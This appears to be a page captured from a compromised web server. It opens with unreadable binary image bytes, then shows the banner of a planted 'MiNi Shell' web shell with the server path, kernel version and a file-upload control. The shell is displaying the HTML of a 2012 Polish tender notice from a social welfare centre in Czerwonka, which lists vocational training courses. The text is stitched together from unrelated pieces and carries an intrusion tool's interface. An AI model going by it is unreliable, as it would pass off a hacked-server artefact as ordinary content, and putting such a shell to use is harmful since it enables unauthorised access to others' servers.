JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120725/269126-N-2012.html

<p class="kh_header"><b>Czerwonka: Organizacja i przeprowadzenie kursów dla Gminnego Ośrodka Pomocy Społecznej  w Czerwonce ramach projektu pt: Razem możemy więcej</b><br>
<b>Numer ogłoszenia: 269126 - 2012; data zamieszczenia: 25.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Osrodek Pomocy Społecznej w Czerwonce , Czerwonka Włościańska 38A, 06-232 Czerwonka, woj. mazowieckie, tel. 29 71 79 824, faks 29 71 79 851.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów dla Gminnego Ośrodka Pomocy Społecznej  w Czerwonce ramach projektu pt: Razem możemy więcej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PROGRAM OPERACYJNY - KAPITAŁ LUDZKI - RAZEM MOŻEMY WIĘCEJ 
Tytuł projektu - Razem możemy więcej
Priorytet VII. Promocja integracji społecznej 
Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji  
Poddziałanie 7.1.1 Programu Operacyjnego Kapitał Ludzki Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego. 

Przedmiot zamówienia jest Organizacja i przeprowadzenie kursów dla Gminnego Ośrodka Pomocy Społecznej w Czerwonce ramach projektu pt: Razem możemy więcej współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
Oferent można złożyć ofertę częściową  na wykonanie niżej wymienionych zadań:
	
ZADANIE I

Obsługa kasy fiskalnej obsługa komputera
Ilość osób	9 osob
Ilość godzin dydaktycznych 80 godzin w tym: 20 godzin zajęć teoretycznych  i 60 godzin zajęć  praktycznych.
Termin zajęć	VIII 2012r. do XI 2012 r.



Księgowość
Ilość osób	3 osoby 
Ilość godzin dydaktycznych 60 godzin w tym: 30 godzin zajęć teoretycznych  i 30 godzin zajęć  praktycznych.
Termin zajęć	VIII 2012r. do XI 2012 r.


Małą Gastronomia
Ilość osób 	3 osób
Ilość godzin dydaktycznych 120  godzin dydaktycznych w tym:  40 godzin  zajęć teoretycznych i  80 godzin  zajęć praktycznych 
Termin zajęć	VIII 2012r. do XI 2012 r.

Ratownik Medyczny
Ilość osób	2 osoby 
Ilość godzin dydaktycznych 60 godzin w tym: 30 godzin zajęć teoretycznych  i 30 godzin zajęć  praktycznych.
Termin zajęć	VIII 2012r. do XI 2012 r.

Hydraulik
Ilość osób	1 osoba 
Ilość godzin dydaktycznych  80 godzin w tym: 20 godzin zajęć teoretycznych  i  60 godzin zajęć  praktycznych.
Termin zajęć	VIII 2012r. do XI 2012 r.


Fryzjerstwo
Ilość osób 	5	osób 
Ilość godzin dydaktycznych  120godzin dydaktycznych w tym: zajęcia teoretyczne (maks. 30%) oraz zajęcia praktyczne (min. 70%). Przynajmniej 50% zajęć praktycznych musi odbywać się na żywych modelach.

Termin zajęć	VIII 2012r. do XI 2012 r.


Zdobienie paznokci
Ilość osób 	4 osoby
Ilość godzin dydaktycznych  80 godzin dydaktycznych w tym: zajęcia teoretyczne (maks. 30%) oraz zajęcia praktyczne (min. 70%)

Termin zajęć	VI 2012r. do VIII 2012 r.


Opiekunka osób starszych i dzieci
Ilość osób	3 osoby 
Ilość godzin dydaktycznych  60 godzin 

Termin zajęć	VIII 2012r. do XI 2012 r.


ZADANIE II
Wózek widłowy
Ilość osób	1 osoby 
Ilość godzin dydaktycznych    60 godzin 

Termin zajęć	VIII 2012r. do XI 2012 r.


Prawo jazdy kat. B
Ilość osób	4 osoby 
Ilość godzin dydaktycznych 40 godzin na jedna osobę 

Termin zajęć	VIII 2012r. do XI 2012 r.


Przewóz osób i rzeczy
Ilość osób	1 osoby 
Ilość godzin dydaktycznych   60 godzin 

Termin zajęć	VIII 2012r. do XI 2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie.
Wzór oświadczenia stanowi załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie.
Wzór oświadczenia stanowi załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie.
Wzór oświadczenia stanowi załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie.
Wzór oświadczenia stanowi załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie.
Wzór oświadczenia stanowi załącznik do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić jedynie za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.
Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Prawa zamówień publicznych.  
Zamawiający dopuszcza możliwość zmian do umowy w tym przedłużenia terminu realizacji zamówienia tylko w przypadku wystąpienia okoliczności, które nie wynikają z winy Wykonawcy. 
Zmiany treści i warunków umowy mogą nastąpić również w przypadku wystąpienia:
1)	wady lub zmiany w przedmiocie programu realizacji o czas niezbędny dla dostosowania się Wykonawcy do takiej zmiany,
2)	zawieszenia przez Zamawiającego wykonywania usługi,
3)	zmian w przedmiocie programu  w wyniku zmian przepisów prawa,
4)	rezygnacji z części usługi przez Zamawiającego/wprowadzenie usług zamiennych, jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy,

Każdorazowo wniosek o zmianę umowy składany przez Wykonawcę Zamawiającego musi wpłynąć do Zamawiającego Wykonawcy w formie pisemnej w terminie minimum 7 dni przed planowanym wprowadzeniem zmian. We wniosku o zmianę warunków umowy należy podać czego zmiana dotyczy, dlaczego jest konieczna oraz proponowany termin wprowadzenia zmiany,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czerwonka.pl - bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej, Czerwonka Włościańska 38A, 06-232 Czerwonka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2012 godzina 10:45, miejsce: Gminny Ośrodek Pomocy Społecznej, Czerwonka Włościańska 38A, 06-232 Czerwonka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROGRAM OPERACYJNY - KAPITAŁ LUDZKI - RAZEM MOŻEMY WIĘCEJ 
Tytuł projektu - Razem możemy więcej
Priorytet VII. Promocja integracji społecznej 
Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji  
Poddziałanie 7.1.1 Programu Operacyjnego Kapitał Ludzki Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa kasy fiskalnej  obsługa komputera
Ilość osób	9 osob
Ilość godzin dydaktycznych  80 godzin w tym: 20 godzin zajęć teoretycznych  i 60 godzin zajęć  praktycznych.
30 godzin kasy fiskalnej
50 godzin obsługi komputera
Termin zajęć	VIII 2012r. do XI 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe	
Kasa fiskalna
Znaczenie i funkcje kasy fiskalnej
Wygląd kasy i opis klawiatury
Uruchomienie kasy i wymiana papieru
Zasady sprzedaży
Sporządzanie raportów, faktur, rachunku
Obsługa programu do fakturowania
Zajęcia praktyczne na kasach fiskalnych

Obsługa komputera
Obsługa oprzyrządowania komputerowego.
System operacyjny Windows.
Administrowanie danymi.
Edytor tekstu (Microsoft Word).
Arkusz kalkulacyjny excel 
Internet, poczta elektroniczna, komunikatory internetowe.

Księgowość
Ilość osób	3 osoby 
Ilość godzin dydaktycznych  60 godzin w tym: 30 godzin zajęć teoretycznych  i 30 godzin zajęć  praktycznych.
Termin zajęć	VIII 2012r. do XI 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe	
Podstawowe pojęcia i zakres rachunkowości - regulacje prawne (krajowe i międzynarodowe)
Bilans. Aktywa i pasywa
Rachunek zysków i strat. Przychody i koszty
Zasady ustalania wyniku finansowego
Księgi rachunkowe, zapisy księgowe, dowody księgowe. Inwentaryzacja
Ewidencja zdarzeń gospodarczych na kontach księgowych. Konto księgowe

Małą Gastronomia
Ilość osób 	3 osób
Ilość godzin dydaktycznych  120  godzin dydaktycznych w tym:  40 godzin  zajęć teoretycznych i  80 godzin  zajęć praktycznych 
Termin zajęć	VIII 2012r. do XI 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe	
Podstawy żywienia człowieka 
Technologia z towaroznawstwem 
Wyposażenie techniczne zakładów      gastronomicznych 
Dobra praktyka higieniczna
Zasady racjonalnego żywienia
BHP
Zajęcia praktyczne

Ratownik Medyczny
Ilość osób	2 osoby 
Ilość godzin dydaktycznych 60 godzin w tym: 30 godzin zajęć teoretycznych  i 30 godzin zajęć  praktycznych.
Termin zajęć	VIII 2012r. do XI 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe	
Definicja i cel udzielania pierwszej pomocy.
Podstawa prawna udzielania pierwszej pomocy
Podstawowe zasady udzielania pierwszej pomocy.
Przebieg udzielania pomocy przedmedycznej poszkodowanemu.
Najważniejsze czynności w zakresie pomocy przedlekarskiej; 
Elementarne zasady postępowania w razie: 
Zagrożenia dla ratownika wynikające z udzielania pierwszej pomocy.
Zestaw do udzielania pierwszej pomocy (możliwość zamówienia zestawu).
Przygotowania pacjenta i opieka medyczna podczas transportu Opatrywanie ran
Medyczne czyn. ratunkowe przy zaburzeniach rytmu serca - farmakoterapia, kardiowersja, stymulacja
Intubacja dotchawiczna w laryngoskopii bezpośredniej w nagłym zatrzymaniu krążenia
Układanie osoby w stanie nagłego zagrożenia zdrowotnego w pozycji właściwej
Unieruchamianie kręgosłupa ze szczególnym uwzględnieniem odcinka szyjnego
Przyrządowe przywracanie drożności dróg oddechowych
Wykonywanie dojścia doszpikowego przy użyciu gotowego zestawu
Odbarczenie odmy prężnej drogą nakłucia jamy opłucnowej
Zdarzenia masowe i katastrofy

Hydraulik
Ilość osób	1 osoba 
Ilość godzin dydaktycznych 80 godzin w tym: 20 godzin zajęć teoretycznych  i  60 godzin zajęć  praktycznych.

Termin zajęć	VIII 2012r. do XI 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe	
Program kursu powinien zawierać następujące zagadnienia:
wodociągi - instalacja wewnętrzna
wodociągi - instalacji zewnętrzna
instalacje wodociągowe ciepłej wody
instalacja kanalizacyjna zewnętrzna
instalacja kanalizacyjna wewnętrzna
instalacja centralnego ogrzewania
prace remontowe - konserwacyjne

Fryzjerstwo
Ilość osób 	5	osób 
Ilość godzin dydaktycznych  120godzin dydaktycznych w tym: zajęcia teoretyczne (maks. 30%) oraz zajęcia praktyczne (min. 70%). Przynajmniej 50% zajęć praktycznych musi odbywać się na żywych modelach.

Termin zajęć	VIII 2012r. do XI 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe	
Rysunek zawodowy
Materiały fryzjerskie
Technologia fryzjerstwa
Higiena
BHP i p/poż
Stylizacja 
Praktyczna nauka zawodu

Zdobienie paznokci
Ilość osób 	4 osoby
Ilość godzin dydaktycznych 80 godzin dydaktycznych w tym: zajęcia teoretyczne (maks. 30%) oraz zajęcia praktyczne (min. 70%)

Termin zajęć	VI 2012r. do VIII 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe	Organizacja  gabinetu kosmetycznego
Pielęgnacja dłoni- manicure
Zdobienie i stylizacja  paznokci, wskazania, przeciwwskazania, zalety i wady
Zdobienie  i stylizacja paznokci- zdobienie tradycyjne, metoda akrylowa i żelowa
Pielęgnacja stóp, pedicure
Wizaż

Opiekunka osób starszych i dzieci
Ilość osób	3 osoby 
Ilość godzin dydaktycznych   60 godzin 

Termin zajęć	VIII 2012r. do XI 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe		Sylwetka zawodowa opiekuna osoby starszej: rola i zadania opiekuna osób i formy opieki
Fizjologiczne i psychologiczne aspekty starzenia się.
Choroby wieku podeszłego, obserwacja podopiecznego, pomiar i analiza parametrów.
Organizacja opieki zdrowotnej i pomocy społecznej (na terenie UE).
Pierwsza pomoc w nagłych przypadkach
Budowanie relacji z podopiecznym i jego rodziną
Pielęgnacja osób starszych i przewlekle chorych.
Postępowanie w wybranych problemach zdrowotnych.
Terapia zajęciowej, fizjoterapia, rehabilitacja
Wybrane zagadnienia farmakoterapii
Zasady żywienia ludzi chorych, starszych i niepełnosprawnych.
Podstawowe zagadnienia dotyczące rozwoju i wychowania dziecka
Podstawy psychologii rozwojowej
Zasady i metody wychowania dziecka
Rozpoznawanie i zaspokajanie potrzeb dziecka
Wpływ zabawy na rozwój dziecka
Przygotowanie i dobór pomocy do zabaw
Rodzaje i propozycje zajęć
Potrzeby biologiczne małego dziecka
Choroby wieku dziecięcego w pigułce - rola opiekunki dziecięcej
Opieka nad chorym dzieckiem
Żywienie niemowląt i małych dzieci
Pierwsza pomoc dzieciom w nagłych wypadkach
Wypoczynek a rozwój małego dziecka - spacer, hartowanie, sen
Kąpiel i pielęgnacja skóry dziecka 1 - 3 rok życia
Nagła śmierć łóżeczkowa - jak jej zapobiec?.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wózek widłowy
Ilość osób	1 osoby 
Ilość godzin dydaktycznych     60 godzin 

Termin zajęć	VIII 2012r. do XI 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe	
Typy stosowanych wózków jezdniowych 
Budowa wózka 
Czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkami 
Czynności operatora w czasie pracy z wózkami 
Wiadomości z zakresu ładunkoznawstwa 
Wiadomości z zakresu BHP 
Wiadomości o dozorze technicznym 
Wiadomości związane z wymianą butli gazowych 
Wymiana butli gazowych - pokaz przez instruktora i samodzielna wymiana przez kursantów 
Praktyczna nauka jazdy: 
wózki podnośnikowe
wózki boczne wysokiego składowania (reach truck)
wózki ciągnikowe
wózki akumulatorowe sterowane z poziomu roboczego

Prawo jazdy kat. B
Ilość osób	4 osoby 
Ilość godzin dydaktycznych     40 godzin na jedna osobę 
Termin zajęć	VIII 2012r. do XI 2012 r.
Program  powinien zawierać  wskazane poniżej minimum programowe	Program szkolenia teoretycznego
Budowa, obsługa i eksploatacja samochodu osobowego
Ogólne zasady poruszania się samochodem po drodze: zachowanie ostrożności i właściwej postawy w stosunku do innych uczestników ruchu drogowego
Zasady zachowania bezpiecznych odległości między pojazdami
Środki wpływające na percepcję i szybkość reakcji (alkohol, narkotyki, leki), wpływ zmęczenia i stanu emocjonalnego na zachowanie kierowcy
Ocena warunków na drodze - warunki atmosferyczne, widoczność, nawierzchnia, bezpieczna jazda samochodem w różnych warunkach
Bezpieczne przewożenie pasażerów dorosłych i dzieci
Znaki drogowe
Ruszanie, włączanie się do ruchu, zatrzymanie, postój
Manewry (wyprzedzanie, omijanie, wymijanie, zmiana pasa ruchu)
Skrzyżowania, ronda, ruch kierowany
Używanie świateł pojazdu
Dokumentacja pojazdu, kontrola drogowa 
Udzielanie pierwszej pomocy
Zasady postępowania w razie uczestniczenia w wypadku lub kolizji drogowej
Błędy najczęściej popełniane przez kierowców
Przygotowanie do egzaminu teoretycznego
Egzamin wewnętrzny
Program szkolenia praktycznego
Budowa i obsługa samochodu
Przygotowanie do jazdy, ruszanie, zatrzymanie, zmiana biegów 
Zmiana kierunku jazdy, cofanie
Obsługa świateł
Plac manewrowy - ćwiczenie umiejętności manewrowania pojazdem
Jazda w terenie (dostosowanie prędkości do warunków na drodze, hamowanie awaryjne, bieg 5 i 6)
Jazda w ruchu ulicznym (pasy ruchu, skrzyżowania, ronda, obserwowanie i przewidywanie działań innych uczestników ruchu)
Manewry w ruchu ulicznym (wyprzedzanie, omijanie, wymijanie, parkowanie)
Jazda sportowa (wychodzenie z poślizgu, ostre wchodzenie w zakręty) 
Jazda z nawigacją 
